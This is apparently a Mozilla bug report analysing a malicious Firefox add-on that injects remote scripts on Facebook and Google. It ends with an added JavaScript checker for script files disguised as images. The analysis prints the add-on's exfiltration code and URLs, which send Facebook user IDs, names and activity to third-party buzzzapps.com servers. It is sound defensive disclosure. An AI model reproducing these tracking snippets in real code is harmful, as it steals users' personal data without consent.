Closed Bug 748993 Opened 12 years ago Closed 12 years ago

Malicious "Mukemmel Face+" add-on

Categories

(Toolkit :: Blocklist Policy Requests, defect)

Type: defect
Priority: Not set
Severity: normal

RESOLVED FIXED

People

(Reporter: mhammell, Assigned: jorgev)

Attachments

(1 file)

90.12 KB, application/octet-stream
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.163 Safari/535.19

Steps to reproduce:

Downloaded add-on from www.mukemmelface.com/firefox.html


Actual results:

loads "adobeflashplayer.js" from XPI

    code is based on the less malicious "SocialFixer" plugin

    looks to see if it's on a Facebook or Google domain

    uses HTML5 local storage plus cookies to maintain config/state

    injects a <script> tag to load http://hadi.mukemmelface.com/mukemmelface.js?amtasak=<random_num> when on Facebook
    
    or, injects a <script> tag to load http://hadi.mukemmelface.com/g.js?amtasak=<random_num> when on Google
    
mukemmelface.js:

    loads your public details into the DOM via a call to graph.facebook.com/<uid>&callback=cins
    
    contains the spam URL http://hadi.mukemmelface.com/reklam.html
    
    injects either a <script> tag to load http://hadi.mukemmelface.com/offline.js?cins=<1|2>&amtasak=<uid>&x=<random_number>
    
    ... or a <script> tag to load http://hadi.mukemmelface.com/zaza.js?cins=<1|2>&amtasak=<uid>&x=<random_number>
    
    and a <script> tag to load http://gator1620.hostgator.com/~vazgec/1333458695713783.jpg
    
    
g.js:

    empty at the time the analysis was done
    
    
offline.js / zaza.js (same file):

    JS to install a font
    
    
1333458695713783.jpg:

    not an image file, but JavaScript
    
    sends your FB UID to http://get.buzzzapps.com/xpi/lechat/get_th.php?id_user="+FB_UID+"&ck="+userKey+"&me="+FB_UID (since this loads on every Facebook page load, it also sends the current Facebook URL you're viewing as a referrer, allowing them to track you on Facebook)

    has the ability to send your FB UID and name to http://set.buzzzapps.com/xpi/lechat/register.php?name='+FB_NAME+'&fbid='+FB_UID
    
    sends your FB UID to http://sp1.buzzzapps.com/sp/upload.php?id_user='+FB_UID+'
    
    sends your FB UID to http://ads2.buzzzapps.com/xpi/css/'+a+'/'+FB_UID+'.css
    
    makes an Ajax request to http://cdn.mukemmelface.com/MukemmelFace.js?amtasak=<random_number>
    
    injects ads by appending to the FB ad unit via "<iframe id='"+pubid+"_fr' src='"+reklam+"?umtt="+utma+"&umte="+USER_TYPE+"&ub="+SEXE+"' style='border:0px;margin-left:0px' width='230' height='620' scrolling='no' ></iframe>"
    
    sends your name and FB UID when you submit a bug report via http://set.buzzzapps.com/xpi/lechat/bugreport.php?message="&name="+FB_NAME+&fbid="+FB_UID
    
    sends your name and FB UID to http://get.buzzzapps.com/xpi/lechat/get_all.php?id_post="+tableau_aid+"&id_user="+FB_UID+
    
    posts details of what you do on Facebook via 
    
    function setPost(aid,what){   
        ajaxeur("http://set.buzzzapps.com/xpi/lechat/set.php?id_post="+aid+"&id_user="+FB_UID       
        +"&type="+what,vide, function(){});	
    }
    function unsetPost(aid,what){
        ajaxeur("http://set.buzzzapps.com/xpi/lechat/unset.php?id_post="+aid+"&id_user="+FB_UID
        +"&type="+what,vide, function(){});	
    }
    
    posts status updates to your Timeline / Wall


Expected results:

It shouldn't post your Facebook account information to a 3rd party server or post as you on Facebook without your consent.
ID: {45147e67-4020-47e2-8f7a-55464fb535aa}
Assignee: nobody → jorge
Status: UNCONFIRMED → NEW
Ever confirmed: true
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i86
Status: NEW → RESOLVED
Closed: 12 years ago
Resolution: --- → FIXED
Product: addons.mozilla.org → Toolkit
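
The report notes that 1333458695713783.jpg is pulled in through a <script> tag and contains JavaScript rather than image data. The following is an added example, not part of the bug report or of Mozilla's tooling, of a check over captured fetch records that flags this mismatch. The record shape ({ initiator, url, body }), the function names and the sample hosts are assumptions made for illustration.

```javascript
'use strict';

// Leading magic bytes of common image formats.
const IMAGE_MAGIC = [
  { type: 'jpeg', bytes: [0xff, 0xd8, 0xff] },
  { type: 'png',  bytes: [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a] },
  { type: 'gif',  bytes: [0x47, 0x49, 0x46, 0x38] },
];
const IMAGE_EXT = /\.(jpe?g|png|gif)$/i;

// Return the image type the body really is, or null if it is not an image.
function sniffImage(body) {
  for (const { type, bytes } of IMAGE_MAGIC) {
    if (body.length >= bytes.length && bytes.every((b, i) => body[i] === b)) return type;
  }
  return null;
}

// Flag fetches whose URL path claims an image while the load context or the
// content says otherwise. Hypothetical record shape: { initiator, url, body }.
function auditFetches(records) {
  const findings = [];
  for (const rec of records) {
    let path;
    try { path = new URL(rec.url).pathname; } catch { continue; } // skip unparsable URLs
    if (!IMAGE_EXT.test(path)) continue; // query string is ignored by pathname
    const reasons = [];
    if (rec.initiator === 'script') reasons.push('image-extension-loaded-as-script');
    if (sniffImage(rec.body) === null) reasons.push('body-is-not-an-image');
    if (reasons.length) findings.push({ url: rec.url, reasons });
  }
  return findings;
}

// Constructed sample records (placeholder host, not taken from the report).
const sample = [
  { initiator: 'script', url: 'http://cdn.example.test/12345.jpg?x=1',
    body: Buffer.from('function setPost(aid, what) {}') },
  { initiator: 'img', url: 'http://cdn.example.test/logo.jpg',
    body: Buffer.from([0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10]) },
  { initiator: 'script', url: 'http://cdn.example.test/app.js',
    body: Buffer.from('var a = 1;') },
  { initiator: 'img', url: 'http://cdn.example.test/pixel.gif',
    body: Buffer.from('<html>not a gif</html>') },
];

console.log(JSON.stringify(auditFetches(sample), null, 2));
```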